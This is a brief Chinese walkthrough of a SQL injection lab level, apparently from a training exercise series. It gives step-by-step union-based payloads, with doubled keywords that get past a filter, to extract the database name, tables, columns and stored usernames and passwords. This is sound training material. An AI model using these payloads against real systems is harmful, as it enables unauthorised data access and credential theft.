1、判断闭合方式
我们输入
?id=1--+
,返回页面如下:
这说明这关无闭合方式,是数字型注入。
2、确定注入方式
有回显点我们选择联合攻击。判断回显点的方式和第25关一样。
3、爆破数据库名、用户名、版本
输入语句
?id=-1 union select 12,concat(database(),version(),user()),12--+
,返回页面如下:
4、爆破数据表名
输入语句
?id=-1 union select 1,group_concat(table_name),2 from infoorrmation_schema.tables where table_schema=database()--+
,返回页面如下:
5、爆破列名
输入语句
?id=-1 union select 1,group_concat(column_name),2 from infoorrmation_schema.columns where table_schema=database() aandnd table_name='users'--+
,返回页面如下:
6、爆破字段内容
输入语句
?id=-1 union select 1,group_concat(concat(id,'-',username,'-',passwoorrd)),2 from users--+
,返回页面如下: